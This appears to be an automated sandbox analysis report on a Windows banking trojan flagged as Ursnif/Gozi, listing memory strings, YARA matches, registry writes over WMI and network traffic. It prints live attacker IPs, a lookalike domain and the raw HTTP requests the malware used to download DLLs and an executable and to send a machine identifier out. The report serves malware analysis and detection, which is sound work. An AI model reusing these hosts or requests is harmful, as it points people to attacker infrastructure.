Source: powershell.exe, 00000007.00000002.564417682.0000024AACEF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: powershell.exe, 00000007.00000002.637060024.0000024AC5DCC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 00000007.00000002.614670102.0000024ABD258000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: powershell.exe, 00000007.00000002.566300224.0000024AAD3F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.565510137.0000024AAD1F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: XHSRZM23.exe, 00000001.00000002.563297746.000000000064A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://trackingg-protectioon.cdn1.mozilla.net/uploaded/1nOLBbA4MMg8uH2db9T/AXce5fVRPsPAKOJdUYw5Yz/f6
Source: powershell.exe, 00000007.00000002.566300224.0000024AAD3F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: sqlite3.dll.0.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 2If3OY9WA2aU.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 2If3OY9WA2aU.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: powershell.exe, 00000007.00000002.614670102.0000024ABD258000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.614670102.0000024ABD258000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.614670102.0000024ABD258000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: 2If3OY9WA2aU.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: y3enbS6322L5.0.dr, 2If3OY9WA2aU.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 2If3OY9WA2aU.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000007.00000002.566300224.0000024AAD3F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: https://mozilla.org0
Source: powershell.exe, 00000007.00000002.614670102.0000024ABD258000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: y3enbS6322L5.0.dr, 2If3OY9WA2aU.0.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: y3enbS6322L5.0.dr, 2If3OY9WA2aU.0.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: y3enbS6322L5.0.dr, 2If3OY9WA2aU.0.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: y3enbS6322L5.0.dr, 2If3OY9WA2aU.0.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr, mozglue.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: y3enbS6322L5.0.dr, 2If3OY9WA2aU.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: powershell.exe, 00000007.00000002.564417682.0000024AACEF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.vign.
Source: unknown DNS traffic detected: queries for: qpdownloads.com
Source: C:\Users\user\Desktop\EJ6FBXJ9Dg.exe Code function: 0_2_00AF8A8D LocalAlloc,LocalAlloc,StrStrW,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,InternetOpenW,InternetOpenW,InternetConnectW,InternetConnectW,HttpOpenRequestW,HttpOpenRequestW,lstrlen,HttpSendRequestW,lstrlenW,HttpSendRequestW,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,lstrlen,MultiByteToWideChar,MultiByteToWideChar,LocalAlloc,LocalAlloc,lstrlen,MultiByteToWideChar,MultiByteToWideChar,LocalFree,LocalFree,LocalFree, 0_2_00AF8A8D
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll HTTP/1.1Content-Type: text/plain;User-Agent: TakeMyPainBackHost: 188.127.227.51Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/msvcp140.dll HTTP/1.1Content-Type: text/plain;User-Agent: TakeMyPainBackHost: 188.127.227.51Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/vcruntime140.dll HTTP/1.1Content-Type: text/plain;User-Agent: TakeMyPainBackHost: 188.127.227.51Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/mozglue.dll HTTP/1.1Content-Type: text/plain;User-Agent: TakeMyPainBackHost: 188.127.227.51Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/freebl3.dll HTTP/1.1Content-Type: text/plain;User-Agent: TakeMyPainBackHost: 188.127.227.51Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/softokn3.dll HTTP/1.1Content-Type: text/plain;User-Agent: TakeMyPainBackHost: 188.127.227.51Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/sqlite3.dll HTTP/1.1Content-Type: text/plain;User-Agent: TakeMyPainBackHost: 188.127.227.51Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /10103.exe HTTP/1.1Content-Type: text/plain;User-Agent: TakeMyPainBackHost: qpdownloads.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uploaded/7PEROc7T_2Fgr3AlFhC44I/HihA8yGOnHHyC/7qKpRjMK/_2BISfbG8Z1hpAn69C67v7h/gkKIfJKu9W/RfGqkB9ODhAT7t3c5/NgU9QmTJW10x/ljH6Rbwk6Te/NQKogNebUNXkBe/OP8YU_2BPfX7w7JRWnzlY/DYJ2tPBGUU9yVi7O/2UHx3wnrI8usjfi/mEy_2FvxgACU_2BVfF/k_2BhGhcG/DY4c1ymhU_2BCF0kWEYq/M0_2B_2F16h_2BgoOGF/9_2FtG_2F6BZfr3nq2A72O/TaGtamWcSmCx5/BKV7x7CGne61RjWS63/G.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 45.8.158.104Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uploaded/Xac7t2mitXIgCMsf9BuB/MO0_2Fwxiby6n8I6o_2/FDgHHlLSuOuDkfbPQtCcKd/YlwrlyDXRc_2B/ixVyFqQK/k126u_2B_2Ba_2BruFx1_2F/jniVE8w7fc/bk1R9cvUDCNSr3LVX/6pZVXtyVf482/WFP0247XYM7/A2gUdzKCCOqwfV/Gv8pnlgo2_2FOJ3S2ifKR/bqy_2FBRKHq_2Fpg/Vdjwqlx7uWisr2l/fEIsbd32W_2FSgiOj7/dytSGoyJO/SSfkZcDtemeWWSjAjk_2/FpEHeBUMQUi3yJQSNuD/_2FtYwM7I7Bk/pKYwZ.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 45.8.158.104Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /uploaded/zbAczskpRoi/wpOTNz2ovPWOn_/2B_2FrKEtFFbUGtGX6UpM/aPAjWjIABTFmZnGA/TX3qfwxbX9aDBL1/IeT5piixzi8h4SRl9u/8_2B0Atg2/EH_2BuWU2tSI81tfObAy/vUlIlX4Ry5a2Lkg_2BA/WrsB69Jk6Nr0AfUnViCZgr/xOQsHH2r7bRf4/GbUKvAO_/2B_2BNCAwjUDjs1PnMfwFho/BSlcplWuk_/2ByFg1B7Jha7Qhk7w/kMamT9D_2B57/Uw_2B3UVmpC/BA7AL3JebG7W65/8MiRPWVyAeG2AtQC9YkgU/qP7k.pct HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 45.8.158.104Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown TCP traffic detected without corresponding DNS query: 188.127.227.51
Source: unknown HTTP traffic detected: POST / HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: TakeMyPainBackHost: 188.127.227.51Content-Length: 94Connection: Keep-AliveCache-Control: no-cacheData Raw: 6d 61 63 68 69 6e 65 49 64 3d 64 30 36 65 64 36 33 35 2d 36 38 66 36 2d 34 65 39 61 2d 39 35 35 63 2d 34 38 39 39 66 35 66 35 37 62 39 61 7c 6a 6f 6e 65 73 26 63 6f 6e 66 69 67 49 64 3d 62 33 63 61 33 66 63 39 31 37 37 39 36 33 33 61 34 37 39 38 31 30 34 35 36 36 38 65 30 39 63 34 Data Ascii: machineId=d06ed635-68f6-4e9a-955c-4899f5f57b9a|user&configId=b3ca3fc91779633a47981045668e09c4

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.511157759.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.637060024.0000024AC5DCC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463138382.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.508255245.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463345859.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463360995.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463226979.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463317653.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463266718.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463179986.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.510097829.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463066679.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: XHSRZM23.exe PID: 1460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5920, type: MEMORYSTR
Source: Yara match File source: 1.3.XHSRZM23.exe.13aa4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.XHSRZM23.exe.1455940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.XHSRZM23.exe.460000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.XHSRZM23.exe.1455940.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.XHSRZM23.exe.14294a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.XHSRZM23.exe.14294a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.XHSRZM23.exe.13aa4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.616496245.0000024ABD467000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.510026391.0000000001429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.509943695.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.564056482.000000000112F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.635823652.0000024AC56F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: XHSRZM23.exe, 00000001.00000002.563297746.000000000064A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud
barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.511157759.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.637060024.0000024AC5DCC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463138382.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.508255245.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463345859.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463360995.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463226979.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463317653.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463266718.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463179986.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.510097829.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.463066679.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: XHSRZM23.exe PID: 1460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5920, type: MEMORYSTR
Source: Yara match File source: 1.3.XHSRZM23.exe.13aa4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.XHSRZM23.exe.1455940.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.XHSRZM23.exe.460000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.XHSRZM23.exe.1455940.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.XHSRZM23.exe.14294a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.XHSRZM23.exe.14294a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.XHSRZM23.exe.13aa4a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.616496245.0000024ABD467000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.510026391.0000000001429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.509943695.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.564056482.000000000112F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.635823652.0000024AC56F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe Code function: 1_2_004647E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 1_2_004647E5

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.564376637.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000001.00000002.564376637.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000007.00000002.637060024.0000024AC5DCC000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000001.00000003.511115658.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000001.00000003.511115658.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000001.00000003.463138382.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000001.00000003.463138382.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000001.00000003.508255245.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000001.00000003.508255245.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000001.00000003.463345859.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000001.00000003.463345859.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000001.00000003.463360995.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000001.00000003.463360995.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000001.00000003.463226979.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000001.00000003.463226979.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000001.00000003.463317653.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000001.00000003.463317653.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000001.00000003.463266718.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000001.00000003.463266718.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000001.00000003.463179986.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000001.00000003.463179986.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000001.00000003.510097829.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000001.00000003.510097829.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: 00000001.00000003.463066679.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: 00000001.00000003.463066679.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: XHSRZM23.exe PID: 1460, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
Source: Process Memory Space: XHSRZM23.exe PID: 1460, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Source: Process Memory Space: powershell.exe PID: 5920, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5920, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
Writes or reads registry keys via WMI
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe Code function: 1_2_004682FC 1_2_004682FC
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe Code function: 1_2_00462DCC 1_2_00462DCC
Source: C:\Users\user\AppData\Roaming\XHSRZM23.exe Code function: 1_2_00462792 1_2_00462792
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_00007FF8180A3AA6 7_2_00007FF8180A3AA6
